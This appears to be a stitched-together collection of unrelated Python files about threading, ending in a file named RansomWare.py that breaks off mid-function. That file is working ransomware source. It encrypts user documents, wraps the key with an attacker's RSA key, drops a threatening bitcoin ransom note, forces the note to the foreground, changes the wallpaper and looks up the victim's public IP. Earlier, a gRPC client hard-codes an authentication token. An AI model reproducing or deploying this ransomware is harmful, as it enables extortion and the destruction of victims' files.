source | python
---|---|
training_queue.py
|
import threading
from concierge import constants
from concierge.concierge_queue import ConciergeQueue
def event_queue_worker():
eq = ConciergeQueue(constants.CF_EVENT,constants.event_queue,constants.EVENT_RATINGS_FILE)
eq.poll()
def media_queue_worker():
mq = ConciergeQueue(constants.CF_MEDIA,constants.media_queue,constants.MEDIA_RATINGS_FILE)
mq.poll()
def place_queue_worker():
pq = ConciergeQueue(constants.CF_PLACE,constants.place_queue,constants.PLACE_RATINGS_FILE)
pq.poll()
def tag_queue_worker():
tq = ConciergeQueue(constants.CF_TAG,constants.tag_queue,constants.TAG_RATINGS_FILE)
tq.poll()
# separate threads
event_queue_thread = threading.Thread(target=event_queue_worker)
event_queue_thread.start()
media_queue_thread = threading.Thread(target=media_queue_worker)
media_queue_thread.start()
place_queue_thread = threading.Thread(target=place_queue_worker)
place_queue_thread.start()
tag_queue_thread = threading.Thread(target=tag_queue_worker)
tag_queue_thread.start()
|
client.py
|
from __future__ import print_function
import grpc
from google.protobuf import json_format
import file_pb2
import file_pb2_grpc
from threading import Thread
import json
from multiprocessing import Queue
try:
import queue
except ImportError:
import Queue as queue
class Client:
""" gRPC Client class for streaming competition platform"""
channel = None
stub = None
def __init__(self, batch_size):
"""
        :param batch_size: Integer value, defined by the competition and available on the competition page.

        The remaining connection settings are hard-coded below rather than passed as parameters:
        the server address ('IP:port'), the user e-mail used when registering for the competition,
        and the token and competition code received after subscribing to a competition.
"""
self.batch_size = batch_size
self.stop_thread = False
self.predictions_to_send = Queue()
self.channel = grpc.insecure_channel('localhost:50051')
self.stub = file_pb2_grpc.DataStreamerStub(self.channel)
self.user_email = 'admin'
self.competition_code = '3M'
self.token = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkk4JBg35D7U'
# self.predictions_to_send.put(file_pb2.Prediction(rowID=1000, target=333))
self.metadata = self.create_metadata(user_id=self.user_email, code=self.competition_code, token=self.token)
@staticmethod
def create_metadata(user_id, code, token):
"""
:param user_id:
:param code:
:param token:
:return:
"""
metadata = [(b'authorization', bytes(token, 'utf-8')), (b'user_id', bytes(user_id, 'utf-8')),
(b'competition_id', bytes(code, 'utf-8'))]
return metadata
def generate_predictions(self):
"""
Sending predictions
:return: Prediction
"""
while True:
try:
prediction = self.predictions_to_send.get(block=True, timeout=60)
print("Prediction: ", prediction)
yield prediction
except queue.Empty:
self.stop_thread = True
break
def loop_messages(self):
"""
Getting messages (data instances) from the stream.
:return:
"""
messages = self.stub.sendData(self.generate_predictions(), metadata=self.metadata)
try:
for message in messages:
message = json.loads(json_format.MessageToJson(message))
print("Original data instance: ", message)
if message['tag'] == 'TEST':
# v = message['target'] + 10
v = 543
prediction = file_pb2.Prediction(rowID=message['rowID'], target=v)
self.predictions_to_send.put(prediction)
if message['tag'] == 'INIT':
i = 1
if message['tag'] == 'TRAIN':
i = 1
if self.stop_thread:
break
except Exception as e:
print(str(e))
pass
def run(self):
"""
Start thread.
"""
print("Start")
t1 = Thread(target=self.loop_messages)
t1.start()
if __name__ == "__main__":
client_1 = Client(batch_size=5)
client_1.run()
|
Downloader.py
|
import os
import multiprocessing as mp
import requests
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from logger import Logger
class Downloader(QThread):
def __init__(self,
name='Downloader',
nprocs=2,
log_dir='.',
parent=None):
QThread.__init__(self, parent)
self.name = name
self.nprocs = nprocs
self.log = Logger(name, save_dir=log_dir)
self.exiting = False
self.args = None
self.dl_queue = mp.Queue()
def __del__(self):
self.exiting = True
self.wait()
    def download(self):
        # Queue the download jobs first, then one sentinel per worker process
        # so that each worker knows when to stop.
        for arg in self.args:
            self.dl_queue.put(arg)
        [self.dl_queue.put(None) for _ in range(self.nprocs)]
dl_procs = [mp.Process(target=self.download_func)
for _ in range(self.nprocs)]
self.log('Starting {} downloads in {} threads'
.format(len(self.args), self.nprocs))
for proc in dl_procs:
proc.start()
[proc.join() for proc in dl_procs]
return 0
def download_func(self):
while True:
arg = self.dl_queue.get()
if arg is None:
break
if self.exiting:
self.log('Download cancel requested')
return -1
url, dl_path = arg
with open(dl_path, 'wb') as file:
res = requests.get(url, stream=True)
if res.headers.get('content-length') is None:
file.write(res.content)
else:
for data in res.iter_content():
file.write(data)
            file_name = os.path.split(dl_path)[1]
            self.log('{} written'.format(file_name))
def run(self):
self.download()
self.log('Download of {} files completed'.format(len(self.args)))
if __name__ == '__main__':
pa = os.path.realpath('patch.png')
pa2 = os.path.realpath('bun.png')
args = [('http://imgs.xkcd.com/comics/patch.png', pa),
('http://imgs.xkcd.com/comics/bun.png', pa2)]
    dl = Downloader()
    dl.args = args      # run() and download() read self.args
    dl.start()          # QThread.start() invokes run() in a background thread
    dl.wait()           # block until the download thread finishes
|
cert_puffin_reconnect_logic.py
|
#!/usr/bin/env python
import logging
import socket
import time
from threading import Thread
from bidfx import Session, Subject, Field
"""
Example of Puffin reconnect logic: a background thread kills the Puffin socket after ten seconds to exercise reconnection.
"""
def on_price_event(event):
print(f"Price update to {event}")
def on_subscription_event(event):
print(f"Subscription to {event.subject} is {event.status}")
def on_provider_event(event):
print(f"Provider {event.provider} is {event.status}")
def main():
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)-7s %(threadName)-12s %(message)s",
)
session = Session.create_from_ini_file()
pricing = session.pricing
pricing.callbacks.price_event_fn = on_price_event
pricing.callbacks.subscription_event_fn = on_subscription_event
pricing.callbacks.provider_event_fn = on_provider_event
session.pricing.start()
def killer():
time.sleep(10)
logging.error("** Killing the Puffin socket connection")
session.pricing._puffin_provider._opened_socket.shutdown(socket.SHUT_RDWR)
pricing.subscribe(
pricing.build.fx.indicative.spot.currency_pair("EURUSD").create_subject()
)
pricing.subscribe(
pricing.build.fx.indicative.spot.currency_pair("USDJPY").create_subject()
)
Thread(target=killer).start()
if __name__ == "__main__":
main()
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
pywebview is a lightweight cross-platform wrapper around a webview component that allows displaying HTML content in
its own dedicated window. It works on Windows, OS X and Linux and is compatible with Python 2 and 3.
(C) 2014-2018 Roman Sirokov and contributors
Licensed under BSD license
http://github.com/r0x0r/pywebview/
"""
import json
import logging
import os
import platform
import re
import sys
from threading import Event, Thread, current_thread
from uuid import uuid4
from functools import wraps
from webview.util import base_uri, parse_file_type, escape_string, transform_url, make_unicode, escape_line_breaks, inject_base_uri
from .js import css
from .localization import localization
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
OPEN_DIALOG = 10
FOLDER_DIALOG = 20
SAVE_DIALOG = 30
class Config (dict):
def __init__(self):
self.use_qt = 'USE_QT' in os.environ
self.use_win32 = 'USE_WIN32' in os.environ
        self.gui = 'qt' if 'KDE_FULL_SESSION' in os.environ else None
        # An explicit PYWEBVIEW_GUI setting overrides the KDE-based default
        if 'PYWEBVIEW_GUI' in os.environ and os.environ['PYWEBVIEW_GUI'].lower() in ['qt', 'gtk', 'win32']:
            self.gui = os.environ['PYWEBVIEW_GUI'].lower()
def __getitem__(self, key):
return getattr(self, key.lower())
def __setitem__(self, key, value):
setattr(self, key.lower(), value)
config = Config()
_initialized = False
_webview_ready = Event()
def _initialize_imports():
def import_gtk():
global gui
try:
import webview.gtk as gui
logger.debug('Using GTK')
return True
except (ImportError, ValueError) as e:
logger.exception('GTK cannot be loaded')
return False
def import_qt():
global gui
try:
import webview.qt as gui
logger.debug('Using QT')
return True
except ImportError as e:
logger.exception('QT cannot be loaded')
return False
def import_cocoa():
global gui
try:
import webview.cocoa as gui
return True
except ImportError:
logger.exception('PyObjC cannot be loaded')
return False
def import_win32():
global gui
try:
import webview.win32 as gui
logger.debug('Using Win32')
return True
except ImportError as e:
logger.exception('PyWin32 cannot be loaded')
return False
def import_winforms():
global gui
try:
import webview.winforms as gui
logger.debug('Using .NET')
return True
except ImportError as e:
logger.exception('pythonnet cannot be loaded')
return False
def try_import(guis):
while guis:
import_func = guis.pop(0)
if import_func():
return True
return False
global _initialized
if not _initialized:
if platform.system() == 'Darwin':
if config.gui == 'qt' or config.use_qt:
guis = [import_qt, import_cocoa]
else:
guis = [import_cocoa, import_qt]
if not try_import(guis):
raise Exception('You must have either PyObjC (for Cocoa support) or Qt with Python bindings installed in order to use pywebview.')
elif platform.system() == 'Linux' or platform.system() == 'OpenBSD':
if config.gui == 'gtk' or config.gui != 'qt' and not config.use_qt:
guis = [import_gtk, import_qt]
else:
guis = [import_qt, import_gtk]
if not try_import(guis):
raise Exception('You must have either QT or GTK with Python extensions installed in order to use pywebview.')
elif platform.system() == 'Windows':
if config.gui == 'win32' or config.use_win32:
guis = [import_win32, import_winforms]
else:
guis = [import_winforms, import_win32]
if not try_import(guis):
raise Exception('You must have either pythonnet or pywin32 installed in order to use pywebview.')
else:
raise Exception('Unsupported platform. Only Windows, Linux, OS X, OpenBSD are supported.')
_initialized = True
def _api_call(function):
"""
    Decorator to call a pywebview API, checking for _webview_ready and raising
    appropriate exceptions on failure.
"""
@wraps(function)
def wrapper(*args, **kwargs):
try:
_webview_ready.wait(5)
return function(*args, **kwargs)
except NameError:
raise Exception('Create a web view window first, before invoking this function')
except KeyError:
try:
uid = kwargs['uid']
except KeyError:
# uid not passed as a keyword arg, assumes it to be last in the arg list
uid = args[-1]
raise Exception('Cannot call function: No webview exists with uid: {}'.format(uid))
return wrapper
def create_window(title, url=None, js_api=None, width=800, height=600,
resizable=True, fullscreen=False, min_size=(200, 100), strings={}, confirm_quit=False,
background_color='#FFFFFF', text_select=False, debug=False):
"""
Create a web view window using a native GUI. The execution blocks after this function is invoked, so other
program logic must be executed in a separate thread.
:param title: Window title
:param url: URL to load
    :param width: window width. Default is 800px
    :param height: window height. Default is 600px
    :param resizable: True if window can be resized, False otherwise. Default is True
:param fullscreen: True if start in fullscreen mode. Default is False
:param min_size: a (width, height) tuple that specifies a minimum window size. Default is 200x100
:param strings: a dictionary with localized strings
:param confirm_quit: Display a quit confirmation dialog. Default is False
:param background_color: Background color as a hex string that is displayed before the content of webview is loaded. Default is white.
:param text_select: Allow text selection on page. Default is False.
:return: The uid of the created window.
"""
valid_color = r'^#(?:[0-9a-fA-F]{3}){1,2}$'
if not re.match(valid_color, background_color):
raise ValueError('{0} is not a valid hex triplet color'.format(background_color))
# Check if starting up from main thread; if not, wait; finally raise exception
if current_thread().name == 'MainThread':
uid = 'master'
if not _initialized:
_initialize_imports()
localization.update(strings)
else:
uid = 'child_' + uuid4().hex[:8]
if not _webview_ready.wait(5):
raise Exception('Call create_window from the main thread first, and then from subthreads')
_webview_ready.clear() # Make API calls wait while the new window is created
gui.create_window(uid, make_unicode(title), transform_url(url),
width, height, resizable, fullscreen, min_size, confirm_quit,
background_color, debug, js_api, text_select, _webview_ready)
return uid
@_api_call
def create_file_dialog(dialog_type=OPEN_DIALOG, directory='', allow_multiple=False, save_filename='', file_types=()):
"""
Create a file dialog
    :param dialog_type: Dialog type: open file (OPEN_DIALOG), save file (SAVE_DIALOG), open folder (FOLDER_DIALOG). Default
    is open file.
:param directory: Initial directory
:param allow_multiple: Allow multiple selection. Default is false.
:param save_filename: Default filename for save file dialog.
:param file_types: Allowed file types in open file dialog. Should be a tuple of strings in the format:
filetypes = ('Description (*.extension[;*.extension[;...]])', ...)
:return: A tuple of selected files, None if cancelled.
"""
if type(file_types) != tuple and type(file_types) != list:
raise TypeError('file_types must be a tuple of strings')
for f in file_types:
parse_file_type(f)
if not os.path.exists(directory):
directory = ''
return gui.create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_types)
@_api_call
def load_url(url, uid='master'):
"""
    Load a new URL into a previously created WebView window. This function must be invoked after a WebView window is
    created with create_window(). Otherwise an exception is thrown.
:param url: url to load
:param uid: uid of the target instance
"""
gui.load_url(url, uid)
@_api_call
def load_html(content, base_uri=base_uri(), uid='master'):
"""
    Load new content into a previously created WebView window. This function must be invoked after a WebView window is
    created with create_window(). Otherwise an exception is thrown.
:param content: Content to load.
:param base_uri: Base URI for resolving links. Default is the directory of the application entry point.
:param uid: uid of the target instance
"""
content = make_unicode(content)
gui.load_html(content, base_uri, uid)
@_api_call
def load_css(stylesheet, uid='master'):
code = css.src % stylesheet.replace('\n', '').replace('\r', '').replace('"', "'")
gui.evaluate_js(code, uid)
@_api_call
def set_title(title, uid='master'):
"""
Sets a new title of the window
"""
gui.set_title(title, uid)
@_api_call
def get_current_url(uid='master'):
"""
Get the URL currently loaded in the target webview
:param uid: uid of the target instance
"""
return gui.get_current_url(uid)
@_api_call
def destroy_window(uid='master'):
"""
Destroy a web view window
:param uid: uid of the target instance
"""
gui.destroy_window(uid)
@_api_call
def toggle_fullscreen(uid='master'):
"""
Toggle fullscreen mode
:param uid: uid of the target instance
"""
gui.toggle_fullscreen(uid)
@_api_call
def set_window_size(width, height, uid='master'):
"""
Set Window Size
:param width: desired width of target window
:param height: desired height of target window
:param uid: uid of the target instance
"""
gui.set_window_size(width, height, uid)
@_api_call
def evaluate_js(script, uid='master'):
"""
Evaluate given JavaScript code and return the result
:param script: The JavaScript code to be evaluated
:param uid: uid of the target instance
:return: Return value of the evaluated code
"""
escaped_script = 'JSON.stringify(eval("{0}"))'.format(escape_string(script))
return gui.evaluate_js(escaped_script, uid)
def window_exists(uid='master'):
"""
Check whether a webview with the given UID is up and running
:param uid: uid of the target instance
:return: True if the window exists, False otherwise
"""
try:
get_current_url(uid)
return True
except:
return False
def webview_ready(timeout=None):
"""
    :param timeout: optional timeout in seconds
    :return: True when the last opened window is ready. False if the timeout is reached, when the timeout parameter is provided.
    Until then the call blocks the calling thread.
"""
return _webview_ready.wait(timeout)
def _js_bridge_call(uid, api_instance, func_name, param):
def _call():
result = json.dumps(function(func_params))
code = 'window.pywebview._returnValues["{0}"] = {{ isSet: true, value: {1}}}'.format(func_name, escape_line_breaks(result))
evaluate_js(code, uid)
function = getattr(api_instance, func_name, None)
if function is not None:
try:
func_params = param if not param else json.loads(param)
t = Thread(target=_call)
t.start()
except Exception as e:
logger.exception('Error occurred while evaluating function {0}'.format(func_name))
else:
logger.error('Function {}() does not exist'.format(func_name))
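

# Illustrative usage sketch (an addition, not part of the original module; the URL
# below is a placeholder): as the create_window() docstring notes, the call blocks
# the invoking thread, so application logic has to run in a separate thread.
if __name__ == '__main__':
    def _background_logic():
        # webview_ready() blocks until the window can accept API calls
        if webview_ready(timeout=10):
            load_url('https://example.com', uid='master')

    Thread(target=_background_logic).start()
    create_window('Demo window', 'https://example.com')  # blocks until the window is closed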
|
creating _db_values.py
|
import os
import random
import datetime
import csv
import threading
import time
random.seed(os.urandom(16))
pessoa = {"sexo": ["M","F"],
"idade":[str(x) for x in range(128)],
"renda":[str(x) for x in range(1024)],
"escolaridade":["0","1","2","3"],
"idioma":[str(x) for x in range(4096)],
"pais":[str(x) for x in range(256)],
"localizador":["-1.45502-48.5024","-23.5489-46.6388"]}
def generate_data():
data = (pessoa["sexo"][random.randint(0,1)],random.randint(0,127),random.randint(0,1023),random.randint(0,3),
random.randint(0,4095),random.randint(0,255),pessoa["localizador"][random.randint(0,1)])
with open("test.csv",'a',newline='') as file:
datawriter = csv.writer(file, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
#datawriter.writerow(['Sexo','idade','renda','escolaridade','idioma','pais','localizador'])
for x in range(10**7):
            # Column order matches the commented header above: sexo, idade, renda, escolaridade, idioma, pais, localizador
            datawriter.writerow([pessoa["sexo"][random.randint(0,1)], random.randint(0,127), random.randint(0,1023),
                                 random.randint(0,3), random.randint(0,4095), random.randint(0,255),
                                 pessoa["localizador"][random.randint(0,1)]])
print(datetime.datetime.now())
t1=threading.Thread(target=generate_data)
t2=threading.Thread(target=generate_data)
t3=threading.Thread(target=generate_data)
t4=threading.Thread(target=generate_data)
t5=threading.Thread(target=generate_data)
t6=threading.Thread(target=generate_data)
t7=threading.Thread(target=generate_data)
t8=threading.Thread(target=generate_data)
t9=threading.Thread(target=generate_data)
t10=threading.Thread(target=generate_data)
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
while t10.is_alive():
print("thread 10 is still alive")
time.sleep(5)
print(datetime.datetime.now())
|
multi2.py
|
"""
Use multiprocess anonymous pipes to communicate. Returns 2 connection
object representing ends of the pipe: objects are sent on one end and
received on the other, though pipes are bidirectional by default
"""
import os
from multiprocessing import Process, Pipe
def sender(pipe):
"""
send object to parent on anonymous pipe
"""
pipe.send(['spam'] + [42, 'eggs'])
pipe.close()
def talker(pipe):
"""
send and receive objects on a pipe
"""
pipe.send(dict(name='Bob', spam=42))
reply = pipe.recv()
print('talker got:', reply)
if __name__ == '__main__':
(parentEnd, childEnd) = Pipe()
Process(target=sender, args=(childEnd,)).start() # spawn child with pipe
print('parent got:', parentEnd.recv()) # receive from child
parentEnd.close() # or auto-closed on gc
(parentEnd, childEnd) = Pipe()
child = Process(target=talker, args=(childEnd,))
child.start()
    print('parent got:', parentEnd.recv())                # receive from child
parentEnd.send({x * 2 for x in 'spam'}) # send to child
child.join() # wait for child exit
print('parent exit')
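

# Illustrative sketch (an addition, not from the original script): passing
# duplex=False to Pipe() gives a one-way pair instead of the default
# bidirectional pair: the first connection can only receive, the second can only send.
def one_way_sender(pipe):
    """send a single object to the parent over a one-way pipe"""
    pipe.send('one-way message')
    pipe.close()

if __name__ == '__main__':
    recvEnd, sendEnd = Pipe(duplex=False)
    Process(target=one_way_sender, args=(sendEnd,)).start()
    print('parent got:', recvEnd.recv())      # receive from child over the read-only end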
|
util.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
File: util.py
Description: util module for Python SDK sample.
"""
from threading import Thread
import io
import operator
import os.path
from PIL import Image
import wx
try:
import cognitive_face as CF
except ImportError:
import sys
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import cognitive_face as CF
IMAGE_WILDCARD = 'Image files (*.jpg, *.png)|*.jpg; *.png'
INNER_PANEL_WIDTH = 710
MAX_IMAGE_SIZE = 300
MAX_THUMBNAIL_SIZE = 75
STYLE = wx.SIMPLE_BORDER
SUBSCRIPTION_KEY_FILENAME = 'Subscription.txt'
ENDPOINT_FILENAME = 'Endpoint.txt'
ORIENTATION_TAG = 274
LOG_FACE_LIST_REQUEST = (
'Request: Face List {} will be used for build person database. '
'Checking whether group exists.')
LOG_FACE_LIST_NOT_EXIST = 'Response: Face List {} does not exist before.'
LOG_FACE_LIST_EXIST = 'Response: Face List {} exists.'
LABEL_FACE = ('{}, {} years old\n'
'Hair: {}, Facial Hair: {}\n'
'Makeup: {}, Emotion: {}\n'
'Occluded: {}, Exposure: {}\n'
'{}\n{}\n')
class SubscriptionKey(object):
"""Subscription Key."""
@classmethod
def get(cls):
"""Get the subscription key."""
if not hasattr(cls, 'key'):
cls.key = ''
if not cls.key:
if os.path.isfile(SUBSCRIPTION_KEY_FILENAME):
with io.open(SUBSCRIPTION_KEY_FILENAME, encoding='utf-8') as fin:
cls.key = fin.read().strip()
else:
cls.key = ''
CF.Key.set(cls.key)
return cls.key
@classmethod
def set(cls, key):
"""Set the subscription key."""
cls.key = key
with io.open(SUBSCRIPTION_KEY_FILENAME, 'w', encoding='utf-8') as fout:
fout.write(key)
CF.Key.set(cls.key)
@classmethod
def delete(cls):
"""Delete the subscription key."""
cls.key = ''
if os.path.isfile(SUBSCRIPTION_KEY_FILENAME):
os.remove(SUBSCRIPTION_KEY_FILENAME)
CF.Key.set(cls.key)
class Endpoint(object):
"""Endpoint."""
@classmethod
def get(cls):
"""Get the endpoint."""
if not hasattr(cls, 'endpoint'):
cls.endpoint = ''
if not cls.endpoint:
if os.path.isfile(ENDPOINT_FILENAME):
with io.open(ENDPOINT_FILENAME, encoding='utf-8') as fin:
cls.endpoint = fin.read().strip()
else:
cls.endpoint = CF.BaseUrl.get()
CF.BaseUrl.set(cls.endpoint)
return cls.endpoint
@classmethod
def set(cls, endpoint):
"""Set the endpoint."""
cls.endpoint = endpoint
with io.open(ENDPOINT_FILENAME, 'w', encoding='utf-8') as fout:
fout.write(endpoint)
CF.BaseUrl.set(cls.endpoint)
@classmethod
def delete(cls):
"""Delete the endpoint."""
cls.endpoint = ''
if os.path.isfile(ENDPOINT_FILENAME):
os.remove(ENDPOINT_FILENAME)
CF.BaseUrl.set(CF.util.DEFAULT_BASE_URL)
def scale_image(img, size=MAX_IMAGE_SIZE):
"""Scale the wx.Image."""
width = img.GetWidth()
height = img.GetHeight()
    if width > height:
        new_width = size
        new_height = int(size * height / width)
    else:
        new_height = size
        new_width = int(size * width / height)
img = img.Scale(new_width, new_height)
return img
def rotate_image(path):
"""Rotate the image from path and return wx.Image."""
img = Image.open(path)
try:
exif = img._getexif()
if exif[ORIENTATION_TAG] == 3:
img = img.rotate(180, expand=True)
elif exif[ORIENTATION_TAG] == 6:
img = img.rotate(270, expand=True)
elif exif[ORIENTATION_TAG] == 8:
img = img.rotate(90, expand=True)
except:
pass
return pil_image_to_wx_image(img)
def draw_bitmap_rectangle(bitmap, faces):
"""Draw rectangle on bitmap."""
dc = wx.MemoryDC(bitmap.bmp)
dc.SetPen(wx.BLUE_PEN)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.SetTextBackground('black')
dc.SetTextForeground('white')
dc.SetBackgroundMode(wx.SOLID)
dc.SetFont(
wx.Font(8, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_BOLD))
for face in faces:
dc.DrawRectangle(
face.rect.left * bitmap.scale, face.rect.top * bitmap.scale,
face.rect.width * bitmap.scale, face.rect.height * bitmap.scale)
if face.name:
text_width, text_height = dc.GetTextExtent(face.name)
dc.DrawText(face.name, face.rect.left * bitmap.scale,
face.rect.top * bitmap.scale - text_height)
dc.SelectObject(wx.NullBitmap)
bitmap.bitmap.SetBitmap(bitmap.bmp)
def pil_image_to_wx_image(pil_image):
"""Convert from PIL image to wx image."""
wx_image = wx.Image(pil_image.width, pil_image.height)
wx_image.SetData(pil_image.convert("RGB").tobytes())
return wx_image
def key_with_max_value(item):
"""Get the key with maximum value in a dict."""
return max(item.items(), key=operator.itemgetter(1))[0]
def async_call(func):
    """Run the wrapped function in a background thread.

    Note: the original name ``async`` is a reserved keyword since Python 3.7,
    so a different name is used here.
    """
    def wrapper(*args, **kwargs):
        """Async wrapper."""
        thr = Thread(target=func, args=args, kwargs=kwargs)
        thr.start()
    return wrapper
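

# Illustrative usage sketch (an addition, not part of the original sample; the
# function below is hypothetical): decorating a function with async_call makes
# the call return immediately while the body runs on a background thread,
# keeping the wx UI responsive during slow API calls.
@async_call
def example_background_task(label):
    """Hypothetical helper used only to demonstrate the decorator."""
    print('running {} off the UI thread'.format(label))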
|
RansomWare.py
|
# Imports
from cryptography.fernet import Fernet # encrypt/decrypt files on target system
import os # to get system root
import webbrowser # to load webbrowser to go to specific website eg bitcoin
import ctypes # so we can intereact with windows dlls and change windows background etc
import urllib.request # used for downloading and saving background image
import requests # used to make get reqeust to api.ipify.org to get target machine ip addr
import time # used to time.sleep interval for ransom note & check desktop to decrypt system/files
import datetime # to give time limit on ransom note
import subprocess # to create process for notepad and open ransom note
import win32gui # used to get window text to see if ransom note is on top of all other windows
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import base64
import threading # used for ransom note and decryption key on dekstop
class RansomWare:
# File exstensions to seek out and Encrypt
file_exts = [
'txt',
'xls',
'xlsx',
'pem',
'rtf',
'jpg',
'png',
# We comment out 'png' so that we can see the RansomWare only encrypts specific files that we have chosen-
# -and leaves other files un-ecnrypted etc.
# 'png',
]
def __init__(self):
# Key that will be used for Fernet object and encrypt/decrypt method
self.key = None
# Encrypt/Decrypter
self.crypter = None
# RSA public key used for encrypting/decrypting fernet object eg, Symmetric key
self.public_key = None
''' Root directorys to start Encryption/Decryption from
CAUTION: Do NOT use self.sysRoot on your own PC as you could end up messing up your system etc...
CAUTION: Play it safe, create a mini root directory to see how this software works it is no different
CAUTION: eg, use 'localRoot' and create Some folder directory and files in them folders etc.
'''
# Use sysroot to create absolute path for files, etc. And for encrypting whole system
self.sysRoot = os.path.expanduser('~')
# Use localroot to test encryption softawre and for absolute path for files and encryption of "test system"
self.localRoot = r'C:\Users\Username\Desktop\localRoot' # Debugging/Testing
# Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL)
self.publicIP = requests.get('https://api.ipify.org').text
# Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data
def generate_key(self):
# Generates a url safe(base64 encoded) key
self.key = Fernet.generate_key()
# Creates a Fernet object with encrypt/decrypt methods
self.crypter = Fernet(self.key)
# Write the fernet(symmetric key) to text file
def write_key(self):
with open('fernet_key.txt', 'wb') as f:
f.write(self.key)
# Encrypt [SYMMETRIC KEY] that was created on victim machine to Encrypt/Decrypt files with our PUBLIC ASYMMETRIC-
# -RSA key that was created on OUR MACHINE. We will later be able to DECRYPT the SYSMETRIC KEY used for-
# -Encrypt/Decrypt of files on target machine with our PRIVATE KEY, so that they can then Decrypt files etc.
def encrypt_fernet_key(self):
with open('fernet_key.txt', 'rb') as fk:
fernet_key = fk.read()
with open('fernet_key.txt', 'wb') as f:
# Public RSA key
self.public_key = RSA.import_key(open('public.pem').read())
# Public encrypter object
public_crypter = PKCS1_OAEP.new(self.public_key)
# Encrypted fernet key
enc_fernent_key = public_crypter.encrypt(fernet_key)
# Write encrypted fernet key to file
f.write(enc_fernent_key)
# Write encrypted fernet key to dekstop as well so they can send this file to be unencrypted and get system/files back
with open(f'{self.sysRoot}\Desktop\EMAIL_ME.txt', 'wb') as fa:
fa.write(enc_fernent_key)
# Assign self.key to encrypted fernet key
self.key = enc_fernent_key
# Remove fernet crypter object
self.crypter = None
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt file - file_path:str:absolute file path eg, C:/Folder/Folder/Folder/Filename.txt
def crypt_file(self, file_path, encrypted=False):
with open(file_path, 'rb') as f:
# Read data from file
data = f.read()
if not encrypted:
# Print file contents - [debugging]
print(data)
# Encrypt data from file
_data = self.crypter.encrypt(data)
# Log file encrypted and print encrypted contents - [debugging]
print('> File encrpyted')
print(_data)
else:
# Decrypt data from file
_data = self.crypter.decrypt(data)
# Log file decrypted and print decrypted contents - [debugging]
print('> File decrpyted')
print(_data)
with open(file_path, 'wb') as fp:
# Write encrypted/decrypted data to file using same filename to overwrite original file
fp.write(_data)
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt files on system using the symmetric key that was generated on victim machine
def crypt_system(self, encrypted=False):
system = os.walk(self.localRoot, topdown=True)
for root, dir, files in system:
for file in files:
file_path = os.path.join(root, file)
if not file.split('.')[-1] in self.file_exts:
continue
if not encrypted:
self.crypt_file(file_path)
else:
self.crypt_file(file_path, encrypted=True)
@staticmethod
def what_is_bitcoin():
url = 'https://bitcoin.org'
# Open browser to the https://bitcoin.org so they know what bitcoin is
webbrowser.open(url)
def change_desktop_background(self):
imageUrl = 'https://images.idgesg.net/images/article/2018/02/ransomware_hacking_thinkstock_903183876-100749983-large.jpg'
# Go to specif url and download+save image using absolute path
path = f'{self.sysRoot}\Desktop\background.jpg'
urllib.request.urlretrieve(imageUrl, path)
SPI_SETDESKWALLPAPER = 20
# Access windows dlls for funcionality eg, changing dekstop wallpaper
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, path, 0)
def ransom_note(self):
date = datetime.date.today().strftime('%d-%B-Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.sysRoot}Desktop/EMAIL_ME.txt to [email protected]
2. You will recieve your personal BTC address for payment.
Once payment has been completed, send another email to [email protected] stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obselete and will not work, and may cost you more to unlcok your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
# Kill ransom note so we can open it agian and make sure ransom note is in ForeGround (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
# sleep for 10 seconds
time.sleep(10)
count +=1
if count == 5:
break
# Decrypts system when text file with un-encrypted key in it is placed on dekstop of target machine
def put_me_on_desktop(self):
# Loop to check file and if file it will read key and then self.key + self.cryptor will be valid for decrypting-
# -the files
print('started') # Debugging/Testing
while True:
try:
print('trying') # Debugging/Testing
# The ATTACKER decrypts the fernet symmetric key on their machine and then puts the un-encrypted fernet-
# -key in this file and sends it in a email to victim. They then put this on the desktop and it will be-
# -used to un-encrypt the system. AT NO POINT DO WE GIVE THEM THE PRIVATE ASSYEMTRIC KEY etc.
